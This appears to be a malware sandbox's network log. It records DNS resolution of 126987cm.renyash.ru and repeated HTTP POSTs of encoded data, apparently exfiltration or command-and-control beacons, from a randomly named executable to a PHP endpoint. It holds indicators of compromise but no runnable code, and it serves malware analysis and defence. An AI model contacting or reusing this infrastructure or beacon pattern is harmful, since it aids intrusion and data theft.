                                                                                                                                Jan 1, 2025 21:48:57.619230032 CET8050131172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:57.702872038 CET8050131172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:57.749190092 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.020695925 CET8050131172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.061717033 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.131938934 CET5012980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.135689020 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.136312962 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.140671968 CET8050131172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.140729904 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.141096115 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.141160011 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.141271114 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.146013975 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.499340057 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.504179001 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.610589981 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.655435085 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.786775112 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.842969894 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.944658041 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.945313931 CET5013380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.949704885 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.949755907 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.950120926 CET8050133172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.950182915 CET5013380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.950297117 CET5013380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.955045938 CET8050133172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:59.296674967 CET5013380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:59.301512003 CET8050133172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:59.394798994 CET8050133172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:59.436705112 CET5013380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:59.587954998 CET8050133172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:59.634958982 CET5013380192.168.2.4172.67.220.198
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 1, 2025 21:47:26.022555113 CET | 53797 | 53 | 192.168.2.4 | 1.1.1.1
Jan 1, 2025 21:47:26.032793999 CET | 53 | 53797 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 1, 2025 21:47:26.022555113 CET | 192.168.2.4 | 1.1.1.1 | 0x855 | Standard query (0) | 126987cm.renyash.ru | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 1, 2025 21:47:26.032793999 CET | 1.1.1.1 | 192.168.2.4 | 0x855 | No error (0) | 126987cm.renyash.ru | | 172.67.220.198 | A (IP address) | IN (0x0001) | false
Jan 1, 2025 21:47:26.032793999 CET | 1.1.1.1 | 192.168.2.4 | 0x855 | No error (0) | 126987cm.renyash.ru | | 104.21.38.84 | A (IP address) | IN (0x0001) | false
                                                                                                                                • 126987cm.renyash.ru
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:26.042237043 CET | 344 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 344
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:26.405664921 CET | 344 | OUT | Data Raw: 00 03 01 06 03 0f 04 05 05 06 02 01 02 01 01 05 00 03 05 0d 02 05 03 01 07 05 0c 0c 06 00 03 53 0d 53 03 0d 07 05 07 04 0e 56 07 07 05 50 04 04 03 05 0e 5b 0e 01 04 51 04 03 04 01 05 06 04 0c 01 01 0f 0b 00 01 04 07 0e 01 0b 00 0f 51 0f 08 05 01
                                                                                                                                Data Ascii: SSVP[QQZTW\L~|YjwLib[^BRScUc^s{_xBclcv|~oUtwcZe~V@{Sv}b[
Jan 1, 2025 21:47:26.486622095 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:26.761311054 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YkE4CMH6q9Tm%2FBaiQgmQsW28ShB6KjKcf7mtvALbjyOZqFG2iWwmrOQ0jcP6n3srTsn2RfZKa8szH9k4DjujUMl%2B4JLsGnX8ZbI1SXZfeHuUWppMlT45fTbPAeNd1YEJs2taqYAv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d4e3d78de95-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2982&min_rtt=1612&rtt_var=3345&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=688&delivery_rate=116103&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 35 34 30 0d 0a 56 4a 7e 04 7b 6d 67 00 6c 61 60 05 7c 61 7f 03 7e 64 6c 54 6b 70 72 55 7a 4d 77 5c 6a 62 77 5b 77 73 7e 51 79 5f 54 59 76 76 70 4a 7c 61 78 01 55 4b 71 42 74 5c 67 02 68 62 79 00 7c 74 65 50 7b 66 60 0c 7e 4d 77 05 75 61 61 04 63 72 6a 5b 7c 62 76 05 7f 6c 60 0b 69 59 6b 4b 76 76 7b 06 7c 5c 5f 02 7d 63 7e 59 7b 5e 7c 43 6f 67 70 06 6f 53 59 49 6e 5c 7b 5a 7b 63 61 5f 7d 60 78 00 78 77 5d 5f 7e 04 70 5a 61 5f 5e 00 7a 51 41 5b 7f 49 55 50 6b 5f 61 4e 76 7f 6b 5f 78 52 74 04 77 70 54 0d 79 07 79 05 7e 52 7a 4c 6c 5f 79 5a 76 60 6c 5b 61 58 78 04 74 4f 54 50 7e 5d 7a 06 77 4c 6d 00 76 66 68 09 7f 0a 75 05 77 6f 7f 5d 7f 63 6c 49 6f 6c 5d 03 6c 59 76 00 7c 6d 60 08 74 77 6f 5e 7e 61 7d 50 7e 7d 6c 55 6c 0b 62 06 6a 5b 7e 5f 7b 5d 46 51 7c 42 5e 08 7e 60 52 0a 7c 77 50 00 78 0b 7f 06 79 62 78 48 7c 71 55 4b 7c 67 5a 51 7f 5e 65 08 79 70 70 42 7e 72 64 05 74 63 7d 51 7b 5c 79 03 76 76 74 4b 7e 76 5a 03 7e 76 5f 4f 77 4c 6b 01 7c 4c 71 01 7d 77 7a 08 7b 76 5a 42 7d 73 55 48 76 62 7d 02 77 [TRUNCATED]
                                                                                                                                Data Ascii: 540VJ~{mgla`|a~dlTkprUzMw\jbw[ws~Qy_TYvvpJ|axUKqBt\ghby|teP{f`~Mwuaacrj[|bvl`iYkKvv{|\_}c~Y{^|CogpoSYIn\{Z{ca_}`xxw]_~pZa_^zQA[IUPk_aNvk_xRtwpTyy~RzLl_yZv`l[aXxtOTP~]zwLmvfhuwo]clIol]lYv|m`two^~a}P~}lUlbj[~_{]FQ|B^~`R|wPxybxH|qUK|gZQ^eyppB~rdtc}Q{\yvvtK~vZ~v_OwLk|Lq}wz{vZB}sUHvb}wam|qzIllgcDwac{\}J|puD{w^{wZBy}Yxr|xc~L}pRJ{IdD}Lcv_dI~RU|IV|qau||{Btt^zyaW|lX{qrKvcsuqVLt_f
Jan 1, 2025 21:47:26.761328936 CET | 908 | IN | Data Raw: 0b 7f 5e 54 05 74 4c 69 00 77 65 60 08 7f 42 57 4c 77 7c 60 00 7c 73 60 03 78 6c 7b 06 78 5e 76 03 7f 43 6c 41 74 67 78 4e 7f 62 6e 0b 7d 6d 55 41 78 53 7e 4e 7d 5c 61 05 7f 4e 52 0c 7f 6c 5e 0b 7e 70 7c 09 7e 49 7e 4e 78 43 77 02 78 5c 7c 49 7c
                                                                                                                                Data Ascii: ^TtLiwe`BWLw|`|s`xl{x^vClAtgxNbn}mUAxS~N}\aNRl^~p|~I~NxCwx\|I|q{K~gUO|^}OycZ}L|It]WAzO}uvpH}HZ~HS@tbkI|LeL|wX{X`}McurywaS~qT|`}IwDwqs{b[I}^SIxg`LxwZOxm{Fy\^{sf{]NZxg`K}{bqxI~B]}wpkbzPvUwZolRtYyQyOX]}v_z\
Jan 1, 2025 21:47:26.832427979 CET | 320 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 384
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:26.926012039 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:26.940529108 CET | 384 | OUT | Data Raw: 54 55 5b 56 53 44 5c 52 5d 56 5b 57 54 58 51 53 58 52 58 58 5b 5e 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TU[VSD\R]V[WTXQSXRXX[^WBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!'T$46?^0>46+$(8#%$T'"X=&:( X2:!^&%X*7
Jan 1, 2025 21:47:27.196523905 CET | 952 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:27 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fc1cHuBPzTKMTRHGT2qOx84JdFKkRCYNrcKFrEhTRlEqBNBaOTUhJOsbiiZeS1sXClxMPE9XRpLXNJX60jZA7QXfufEo4Ku3dMuYVLHlkWjHXXR1kSuAcuFsxjftuted7WIppoFA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d50fe31de95-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4288&min_rtt=1612&rtt_var=5019&sent=9&recv=10&lost=0&retrans=0&sent_bytes=2194&recv_bytes=1392&delivery_rate=2455156&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 11 3c 08 2b 56 37 0c 29 54 3e 01 2b 11 25 57 26 12 31 33 32 1c 28 5e 33 15 2a 2f 20 1b 32 3f 3b 05 24 5c 29 51 3c 0c 3f 05 2b 36 20 5c 05 1b 3a 07 33 29 27 13 31 38 25 57 29 1e 02 58 37 01 26 5e 3d 20 23 0f 20 3b 26 04 32 3b 29 10 26 2a 26 11 2b 12 0a 04 3d 23 3b 1c 24 2d 2a 51 0f 16 3b 0a 2a 30 03 02 3d 2c 23 02 26 21 2b 01 22 0b 25 55 31 2b 24 0a 27 2a 36 11 3c 2d 24 0e 23 33 30 0b 25 2f 21 00 32 07 2c 0d 2c 3a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!<+V7)T>+%W&132(^3*/ 2?;$\)Q<?+6 \:3)'18%W)X7&^= # ;&2;)&*&+=#;$-*Q;*0=,#&!+"%U1+$'*6<-$#30%/!2,,:&^ "S?UV0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:28.017227888 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1780
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:47:28.387712002 CET | 1780 | OUT | Data Raw: 54 50 5e 53 56 4a 59 50 5d 56 5b 57 54 5e 51 5b 58 51 58 50 5b 50 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TP^SVJYP]V[WT^Q[XQXP[PWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["&"/ !9X!<$(6<+$P5%$0:Y(5>>.41!^&%X*/
Jan 1, 2025 21:47:28.461664915 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:28.135123968 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49741 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:47:28.627285957 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
Jan 1, 2025 21:47:28.983504057 CET | 1072 | OUT | Data Raw: 54 50 5e 57 56 40 59 5f 5d 56 5b 57 54 54 51 5a 58 50 58 5c 5b 50 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TP^WV@Y_]V[WTTQZXPX\[PWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["'?_ ! -+^0.8Z54+U!&'$0Z>&2+4%:!^&%X*
Jan 1, 2025 21:47:29.090163946 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:47:29.394495010 CET | 815 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:29 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=245b%2FSgSd3wvXtSrKdqDZHGSg29AbcnRulU5ts%2FYYd6H5TMx4K0FrJ6P86v%2Fepb3V5%2BfPaJpxs0pg%2FA%2Fr08oQVEW%2BePJzP2W6gNI0eNYvlCDM65tUSGdrCSOeu8Jts7IaOk%2FB8q2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d5e78d24368-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3114&min_rtt=1995&rtt_var=2987&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=133296&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                4 | 192.168.2.4 | 49742 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:29.620697021 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:29.967943907 CET1072OUTData Raw: 51 56 5e 55 56 40 59 55 5d 56 5b 57 54 55 51 52 58 5d 58 50 5b 5e 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QV^UV@YU]V[WTUQRX]XP[^WDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$!/#11"3 [!?$"C430.\>6(?2:!^&%X*
                                                                                                                                Jan 1, 2025 21:47:30.068409920 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:30.343569994 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:30 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cL0kBdXvTwnPtyLy%2FeeyihReHqR0wCmKUkgesvJLTy29IOpjr3Tyx1uKPU%2BYEyu4z1IULYIHhabrGQNQcdEcigtb8dk0aTrq8yCWvWa8qrXfxOzK5Rt9lA1FwT27Il8viB%2F6U4C5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d649de67c90-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3859&min_rtt=1814&rtt_var=4771&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=80312&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                5 | 192.168.2.4 | 49744 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:30.557286024 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:30.905539989 CET1072OUTData Raw: 54 54 5e 50 53 40 59 57 5d 56 5b 57 54 5b 51 5c 58 51 58 5f 5b 5f 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT^PS@YW]V[WT[Q\XQX_[_WGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X&2#T%Y"[35R($Q!&(0 *]=6>>=8Y'*!^&%X*
                                                                                                                                Jan 1, 2025 21:47:31.004554987 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:31.216694117 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:31.283631086 CET810INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:31 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ildLEUPk%2B3YBtcp%2FG%2B%2BFUae5CumsFG5TkZbjEdK8HdcO1fHp174QJnLSUgGhaYaB8iXP2vKgLA21jtc%2FLZ2zi%2BETlLRPeplTelI0AOaROO7BCyLULViHSwd4KlFhzX9wr5NYjAkD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d6a7c5143ed-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3717&min_rtt=1560&rtt_var=4899&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=77585&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                6 | 192.168.2.4 | 49745 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:31.429449081 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:31.780545950 CET1072OUTData Raw: 51 55 5b 52 56 47 59 56 5d 56 5b 57 54 5f 51 58 58 50 58 59 5b 5e 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[RVGYV]V[WT_QXXPXY[^WEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0,7* >7%=Z5;*786%8T$3.])6)<$^2*!^&%X*+
                                                                                                                                Jan 1, 2025 21:47:31.873199940 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:32.131284952 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:32 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W0jcC7MlBcdWtUaPdM2ldYHnsUwwgXTtDqrOh9bUbrObhPFk%2FhjuY%2BCkf6f9eOXCUUymUIhzJ7nSYdJNJudzYMNbkNFGUa1VcL%2BTkgY33qdb81SHyiiSCo9TLrxaNbh9z2beTA5L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
